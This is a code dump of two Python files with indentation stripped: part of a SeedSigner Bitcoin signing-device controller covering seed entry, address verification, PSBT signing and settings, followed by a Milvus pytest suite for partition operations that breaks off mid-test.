change_address = script.p2sh(script.p2wpkh(c_pubkey)).address(network=validate_network)
if address == recieve_address:
self.menu_view.draw_modal(["Receive Address "+str(i), "Verified"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
if address == change_address:
self.menu_view.draw_modal(["Change Address "+str(i), "Verified"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Checking Address "+str(i), "..."], "", "Right to Abort")
if self.buttons.check_for_low(B.KEY_RIGHT) or self.buttons.check_for_low(B.KEY_LEFT):
return Path.MAIN_MENU
if r == 2:
# second QR scan need PSBT now
decoder2 = scan_qr("Scan Backup JSON QR")
if decoder2.isComplete() and decoder2.isWalletDescriptor():
desc_str = decoder2.getWalletDescriptor()
desc_str = desc_str.replace("\n","").replace(" ","")
try:
if len(re.findall (r'\[([0-9,a-f,A-F]+?)(\/[0-9,\/,h\']+?)\].*?(\/0\/\*)', desc_str)) > 0:
p = re.compile(r'(\[[0-9,a-f,A-F]+?\/[0-9,\/,h\']+?\].*?)(\/0\/\*)')
desc_str = p.sub(r'\1/{0,1}/*', desc_str)
elif len(re.findall (r'(\[[0-9,a-f,A-F]+?\/[0-9,\/,h,\']+?\][a-z,A-Z,0-9]*?)([\,,\)])', desc_str)) > 0:
p = re.compile(r'(\[[0-9,a-f,A-F]+?\/[0-9,\/,h,\']+?\][a-z,A-Z,0-9]*?)([\,,\)])')
desc_str = p.sub(r'\1/{0,1}/*\2', desc_str)
except:
desc_str = decoder2.getWalletDescriptor()
print(desc_str)
desc = Descriptor.from_string(desc_str)
else:
return Path.MAIN_MENU
#
# Validate if address from descriptor
#
for i in range(1000):
r_derived = desc.derive(i,branch_index=0)
c_derived = desc.derive(i,branch_index=1)
recieve_address = r_derived.address(validate_network)
change_address = c_derived.address(validate_network)
if address == recieve_address:
self.menu_view.draw_modal(["Recieved Address "+str(i), "Verified"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
if address == change_address:
self.menu_view.draw_modal(["Change Address "+str(i), "Verified"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Checking Address "+str(i), "..."], "", "Right to Abort")
if self.buttons.check_for_low(B.KEY_RIGHT) or self.buttons.check_for_low(B.KEY_LEFT):
return Path.MAIN_MENU
elif ( decoder.isComplete() and not decoder.isPSBT() ) or decoder.isInvalid():
self.menu_view.draw_modal(["Not a valid PSBT QR"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
return Path.MAIN_MENU
if not seed:
# No valid seed yet, If there is a saved seed, ask to use saved seed
if self.storage.num_of_saved_seeds() > 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Use Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,3,None)
if slot_num == 0:
return Path.MAIN_MENU
seed = self.storage.get_seed(slot_num)
used_saved_seed = True
if not seed:
# no valid seed yet, gather seed phrase
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_qr_12_24_word_menu("... [ Return to Main Menu ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(12)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(24)
elif ret_val == Path.SEED_WORD_QR:
seed.mnemonic = self.seed_tools_view.read_seed_phrase_qr()
else:
return Path.MAIN_MENU
if not seed:
return Path.MAIN_MENU
# check if seed phrase is valid
self.menu_view.draw_modal(["Validating Seed ..."])
if not seed:
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
if len(seed.passphrase) == 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Add Seed Passphrase?")
if r == 1:
# display a tool to pick letters/numbers to make a passphrase
seed.passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry()
if len(seed.passphrase) == 0:
self.menu_view.draw_modal(["No passphrase added", "to seed words"], "", "Left to Exit, Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT])
if input == B.KEY_LEFT:
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Optional passphrase", "added to seed words", seed.passphrase], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
# display seed phrase
while True:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, seed.passphrase, "Right to Continue")
if r == True:
break
else:
# Cancel
return Path.MAIN_MENU
# Ask to save seed
if self.storage.slot_avaliable() and used_saved_seed == False:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
# show transaction information before sign
self.menu_view.draw_modal(["Parsing PSBT"])
p = PSBTParser(psbt,seed,self.settings.network)
self.signing_tools_view.display_transaction_information(p)
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT], False)
if input == B.KEY_LEFT:
return Path.MAIN_MENU
# Sign PSBT
self.menu_view.draw_modal(["PSBT Signing ..."])
sig_cnt = PSBTParser.sigCount(psbt)
psbt.sign_with(p.root)
trimmed_psbt = PSBTParser.trim(psbt)
if sig_cnt == PSBTParser.sigCount(trimmed_psbt):
self.menu_view.draw_modal(["Signing failed", "left to exit", "or right to continue", "to display PSBT QR"], "", "")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT], False)
if input == B.KEY_LEFT:
return Path.MAIN_MENU
# Display Animated QR Code
self.menu_view.draw_modal(["Generating PSBT QR ..."])
e = EncodeQR(psbt=trimmed_psbt, qr_type=self.settings.qr_psbt_type, qr_density=self.settings.qr_density, wordlist=self.settings.wordlist)
while True:
cur_time = int(time.time() * 1000)
if cur_time - self.buttons.last_input_time > self.screensaver_activation_ms and not self.screensaver.is_running:
self.start_screensaver()
self.buttons.update_last_input_time()
else:
image = e.nextPartImage(240,240,1,background=self.current_bg_qr_color)
View.DispShowImage(image)
time.sleep(0.05)
if self.buttons.check_for_low(B.KEY_RIGHT):
break
elif self.buttons.check_for_low(B.KEY_UP):
self.prev_qr_background_color()
elif self.buttons.check_for_low(B.KEY_DOWN):
self.next_qr_background_color()
# Return to Main Menu
return Path.MAIN_MENU
###
### Settings Tools Navigation/Launcher
###
#### Show IO Test
def show_io_test_tool(self):
ret_val = True
ret_val = self.io_test_view.display_io_test_screen()
if ret_val == True:
return Path.SETTINGS_SUB_MENU
### Show Current Network
def show_current_network_tool(self):
r = self.settings_tools_view.display_current_network()
if r is not None:
self.settings.network = r
return Path.SETTINGS_SUB_MENU
### Show Wallet Selection Tool
def show_wallet_tool(self):
r = self.settings_tools_view.display_wallet_selection()
if r is not None:
self.settings.software = r
return Path.SETTINGS_SUB_MENU
### Show QR Density Tool
def show_qr_density_tool(self):
r = self.settings_tools_view.display_qr_density_selection()
if r in (EncodeQRDensity.LOW, EncodeQRDensity.MEDIUM, EncodeQRDensity.HIGH):
self.settings.qr_density = r
return Path.SETTINGS_SUB_MENU
### Show Version Info
def show_version_info(self):
self.settings_tools_view.display_version_info()
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_LEFT:
return Path.SETTINGS_SUB_MENU
elif input == B.KEY_RIGHT:
return Path.SETTINGS_SUB_MENU
### Show Persistent Settings Screen
def show_persistent_settings_tool(self):
r = self.settings_tools_view.display_persistent_settings()
if r is not None:
if r == True:
self.menu_view.draw_modal(["Persistent settings", "keeps settings saved", "across reboot.", "Seeds are never saved"], "Warning", "Right to Continue")
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_RIGHT:
self.settings.persistent = r
else:
self.menu_view.draw_modal(["This will restore", "the default", "settings.", ""], "Warning", "Right to Continue")
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_RIGHT:
self.settings.persistent = r
return Path.SETTINGS_SUB_MENU
### next_qr_background_colors()
def next_qr_background_color(self):
if self.current_bg_qr_color == "FFFFFF":
self.current_bg_qr_color = "DDDDDD"
elif self.current_bg_qr_color == "DDDDDD":
self.current_bg_qr_color = "BBBBBB"
elif self.current_bg_qr_color == "BBBBBB":
self.current_bg_qr_color = "999999"
elif self.current_bg_qr_color == "999999":
self.current_bg_qr_color = "777777"
elif self.current_bg_qr_color == "777777":
self.current_bg_qr_color = "555555"
elif self.current_bg_qr_color == "555555":
self.current_bg_qr_color = "333333"
elif self.current_bg_qr_color == "333333":
self.current_bg_qr_color = "FFFFFF"
self.settings.qr_background_color = self.current_bg_qr_color
### prev_qr_background_colors()
def prev_qr_background_color(self):
if self.current_bg_qr_color == "333333":
self.current_bg_qr_color = "555555"
elif self.current_bg_qr_color == "555555":
self.current_bg_qr_color = "777777"
elif self.current_bg_qr_color == "777777":
self.current_bg_qr_color = "999999"
elif self.current_bg_qr_color == "999999":
self.current_bg_qr_color = "BBBBBB"
elif self.current_bg_qr_color == "BBBBBB":
self.current_bg_qr_color = "DDDDDD"
elif self.current_bg_qr_color == "DDDDDD":
self.current_bg_qr_color = "FFFFFF"
elif self.current_bg_qr_color == "FFFFFF":
self.current_bg_qr_color = "333333"
self.settings.qr_background_color = self.current_bg_qr_color
### Show Donate Screen and QR
def show_camera_rotation_tool(self):
r = self.settings_tools_view.display_camera_rotation()
if r is not None:
self.settings.camera_rotation = r
return Path.SETTINGS_SUB_MENU ### Show Donate Screen and QR
def show_donate_tool(self):
self.settings_tools_view.display_donate_info_screen()
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_LEFT:
return Path.SETTINGS_SUB_MENU
elif input == B.KEY_RIGHT:
self.settings_tools_view.display_donate_qr()
time.sleep(1)
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
def show_reset_tool(self):
self.menu_view.draw_modal(["This will restore", "default settings and", "restart the app", ""], "Warning", "Right to Continue")
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_RIGHT:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Reset SeedSigner?")
if r == 1: #Yes
self.menu_view.display_blank_screen()
self.settings.restoreDefault()
time.sleep(0.1) # give time to write to disk
return_code = os.system("sudo systemctl is-active --quiet seedsigner.service")
if return_code == 0:
# systemd service is running
call("sudo systemctl restart seedsigner.service", shell=True)
time.sleep(2)
else:
# systemd service is not running, restart script internally
os.execv(sys.executable, ['python3'] + sys.argv)
else: # No
return Path.MAIN_MENU
return Path.MAIN_MENU
|
test_partition.py | import threading
import pytest
from base.partition_wrapper import ApiPartitionWrapper
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import PartitionErrorMessage
prefix = "partition_"
class TestPartitionParams(TestcaseBase):
""" Test case of partition interface in parameters"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("partition_name, description",
[(cf.gen_unique_str(prefix), cf.gen_unique_str("desc_"))])
def test_partition_default(self, partition_name, description):
"""
target: verify create a partition
method: 1. create a partition
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
# @pytest.mark.xfail(reason="issue #5375")
@pytest.mark.parametrize("partition_name", [""])
def test_partition_empty_name(self, partition_name):
"""
target: verify create a partition with empyt name
method: 1. create a partition empty none name
expected: 1. raise exception
"""
# create a collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition name should not be empty"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, description", [(cf.gen_unique_str(prefix), "")])
def test_partition_empty_description(self, partition_name, description):
"""
target: verify create a partition with empty description
method: 1. create a partition with empty description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, description",
[(cf.gen_str_by_length(255), cf.gen_str_by_length(2048))])
def test_partition_max_description_length(self, partition_name, description):
"""
target: verify create a partition with 255 length name and 1024 length description
method: 1. create a partition with 255 length name and 1024 length description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection_name, partition_name, description",
[(cf.gen_unique_str(), cf.gen_unique_str(prefix), cf.gen_unique_str())])
def test_partition_dup_name(self, collection_name, partition_name, description):
"""
target: verify create partitions with duplicate name
method: 1. create partitions with duplicate name
expected: 1. create successfully
2. the same partition returned with diff object id
"""
# create a collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w, partition_name, description)
partition_w2 = self.init_partition_wrap(collection_w, partition_name, description)
# public check func to be extracted
assert id(partition_w1.partition) != id(partition_w2.partition)
assert partition_w1.name == partition_w2.name
assert partition_w1.description == partition_w2.description
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("description", ct.get_invalid_strs)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_special_chars_description(self, partition_name, description):
"""
target: verify create a partition with special characters in description
method: 1. create a partition with special characters in description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default_name(self):
"""
target: verify create a partition with default name
method: 1. get the _default partition
2. create a partition with _default name
expected: 1. the same partition returned
"""
# create collection
collection_w = self.init_collection_wrap()
# check that the default partition exists
assert collection_w.has_partition(ct.default_partition_name)[0]
# check that can get the _default partition
collection, _ = collection_w.partition(ct.default_partition_name)
# check that init the _default partition object
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert collection.name == partition_w.name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_str_by_length(256)])
def test_partition_maxlength_name(self, partition_name):
"""
target: verify create a partition with maxlength(256) name
method: 1. create a partition with max length names
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", ct.get_invalid_strs)
def test_partition_invalid_name(self, partition_name):
"""
target: verify create a partition with invalid name
method: 1. create a partition with invalid names
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
# TODO: need an error code issue #5144 and assert independently
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_none_collection(self, partition_name):
"""
target: verify create a partition with none collection
method: 1. create a partition with none collection
expected: 1. raise exception
"""
# create partition with collection is None
self.partition_wrap.init_partition(collection=None, name=partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "must be pymilvus_orm.Collection"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop(self, partition_name):
"""
target: verify drop a partition in one collection
method: 1. create a partition in one collection
2. drop the partition
expected: 1. drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
# check that the partition exists
assert collection_w.has_partition(partition_name)[0]
# drop partition
partition_w.drop()
# check that the partition not exists
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("search_vectors", [cf.gen_vectors(1, ct.default_dim)])
def test_partition_release(self, search_vectors):
"""
target: verify release partition
method: 1. create a collection and several partitions
2. insert data into each partition
3. flush and load the partitions
4. release partition1
5. release partition1 twice
expected: 1. the released partition is released
2. the other partition is not released
"""
# create collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
# insert data to two partition
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
# load two partitions
partition_w1.load()
partition_w2.load()
# search two partitions
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res1) == 1 and len(res2) == 1
# release the first partition
partition_w1.release()
# check result
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "partitions have been released"})
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res2) == 1
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
@pytest.mark.parametrize("data", [cf.gen_default_dataframe_data(10),
cf.gen_default_list_data(10),
cf.gen_default_tuple_data(10)])
def test_partition_insert(self, partition_name, data):
"""
target: verify insert multi entities by dataFrame
method: 1. create a collection and a partition
2. partition.insert(data)
3. insert data again
expected: 1. insert data successfully
"""
nums = 10
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name,
"is_empty": True, "num_entities": 0}
)
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name]) # don't need flush for issue #5737
assert not partition_w.is_empty
assert partition_w.num_entities == nums
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert not partition_w.is_empty
assert partition_w.num_entities == (nums + nums)
class TestPartitionOperations(TestcaseBase):
""" Test case of partition interface in operations """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_dropped_collection(self, partition_name):
"""
target: verify create partition against a dropped collection
method: 1. create collection1
2. drop collection1
3. create partition in collection1
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# drop collection
collection_w.drop()
# create partition failed
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_same_name_in_diff_collections(self, partition_name):
"""
target: verify create partitions with same name in diff collections
method: 1. create a partition in collection1
2. create a partition in collection2
expected: 1. create successfully
"""
# create two collections
collection_w1 = self.init_collection_wrap()
collection_w2 = self.init_collection_wrap()
# create 2 partitions in 2 diff collections
self.init_partition_wrap(collection_wrap=collection_w1, name=partition_name)
self.init_partition_wrap(collection_wrap=collection_w2, name=partition_name)
# check result
assert collection_w1.has_partition(partition_name)[0]
assert collection_w2.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_multi_partitions_in_collection(self):
"""
target: verify create multiple partitions in one collection
method: 1. create multiple partitions in one collection
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
for _ in range(10):
partition_name = cf.gen_unique_str(prefix)
# create partition with different names and check the partition exists
self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_maximum_partitions(self):
"""
target: verify create maximum partitions
method: 1. create maximum partitions
2. create one more partition
expected: 1. raise exception
"""
threads_num = 8
threads = []
def create_partition(collection, threads_n):
for _ in range(ct.max_partition_num // threads_n):
name = cf.gen_unique_str(prefix)
par_wrap = ApiPartitionWrapper()
par_wrap.init_partition(collection, name, check_task=CheckTasks.check_nothing)
collection_w = self.init_collection_wrap()
for _ in range(threads_num):
t = threading.Thread(target=create_partition, args=(collection_w.collection, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
p_name = cf.gen_unique_str()
self.partition_wrap.init_partition(
collection_w.collection, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "maximum partition's number should be limit to 4096"})
@pytest.mark.tags(CaseLabel.L0)
def test_partition_drop_default_partition(self):
"""
target: verify drop the _default partition
method: 1. drop the _default partition
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
default_partition, _ = collection_w.partition(ct.default_partition_name)
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert default_partition.name == partition_w.name
# verify that drop partition with error
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "default partition cannot be deleted"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop_partition_twice(self, partition_name):
"""
target: verify drop the same partition twice
method: 1.create a partition with default schema
2. drop the partition
3. drop the same partition again
expected: raise exception when 2nd time
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
collection_w.has_partition(partition_name)
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
# verify that drop the partition again with exception
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_create_and_drop_multi_times(self, partition_name):
"""
target: verify create and drop for times
method: 1.create a partition with default schema
2. drop the partition
3. loop #1 and #2 for times
expected: create and drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# range for 5 times
for i in range(5):
# create partition and check that the partition exists
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop partition and check that the partition not exists
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.parametrize("flush", [True, False])
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop_non_empty_partition(self, partition_name):
"""
target: verify drop a partition which has data inserted
method: 1.create a partition with default schema
2. insert some data
3. flush / not flush
3. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data())
# # flush remove flush for issue #5837
# if flush:
# self._connect().flush([collection_w.name])
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.parametrize("flush", [True, False])
@pytest.mark.parametrize("partition_name, data", [(cf.gen_unique_str(prefix), cf.gen_default_list_data(nb=3000))])
@pytest.mark.parametrize("index_param", cf.gen_simple_index())
def test_partition_drop_indexed_partition(self, partition_name, data, index_param):
"""
target: verify drop an indexed partition
method: 1.create a partition
2. insert same data
3. create an index
4. flush or not flush (remove flush step for issue # 5837)
5. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
# create index of collection
collection_w.create_index(ct.default_float_vec_field_name, index_param)
# # flush
# if flush:
# self._connect().flush([collection_w.name])
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_empty_partition(self):
"""
target: verify release an empty partition
method: 1.create a partition
2. release the partition
expected: release successfully
"""
# create partition
partition_w = self.init_partition_wrap()
assert partition_w.is_empty
# release partition
partition_w.release()
# TODO: assert no more memory consumed
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_dropped_partition(self):
"""
target: verify release an dropped partition
method: 1.create a partition
2. drop the partition
2. release the partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# release the dropped partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_release_dropped_collection(self, partition_name):
"""
target: verify release an dropped collection
method: 1.create a collection and partition
2. drop the collection
2. release the partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# release the partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, search_vectors",
[(cf.gen_unique_str(prefix), cf.gen_vectors(1, ct.default_dim))])
def test_partition_release_after_collection_released(self, partition_name, search_vectors):
"""
target: verify release a partition after the collection released
method: 1.create a collection and partition
2. insert some data
2. release the collection
2. release the partition
expected: partition released successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
data = cf.gen_default_list_data()
partition_w.insert(data)
assert partition_w.num_entities == len(data[0])
assert collection_w.num_entities == len(data[0])
# load partition
partition_w.load()
# search of partition
res_1, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res_1) == 1
# release collection
collection_w.release()
# search of partition
res_2, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 0,
ct.err_msg: "not loaded into memory"})
# release partition
partition_w.release()
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, data", [(ct.default_partition_name, cf.gen_default_dataframe_data())])
def test_partition_insert_default_partition(self, partition_name, data):
"""
target: verify insert data into _default partition
method: 1.create a collection
2. insert some data into _default partition
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
assert collection_w.has_partition(partition_name)[0]
partition_w = self.init_partition_wrap(collection_w, partition_name)
# insert data to partition
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == len(data)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_partition(self):
"""
target: verify insert data into dropped partition
method: 1.create a collection
2. insert some data into dropped partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
# TODO: update the assert error
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_insert_dropped_collection(self, partition_name):
"""
target: verify insert data into dropped collection
method: 1.create a collection
2. insert some data into dropped collection
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "None Type"})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_insert_maximum_size_data(self, data):
"""
target: verify insert maximum size data(256M?) a time
method: 1.create a partition
2. insert maximum size data
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w)
# insert data to partition
max_size = 100000 # TODO: clarify the max size of data
ins_res, _ = partition_w.insert(cf.gen_default_dataframe_data(max_size))
assert len(ins_res.primary_keys) == max_size
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == max_size
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [ct.default_dim - 1, ct.default_dim + 1])
def test_partition_insert_mismatched_dimensions(self, dim):
"""
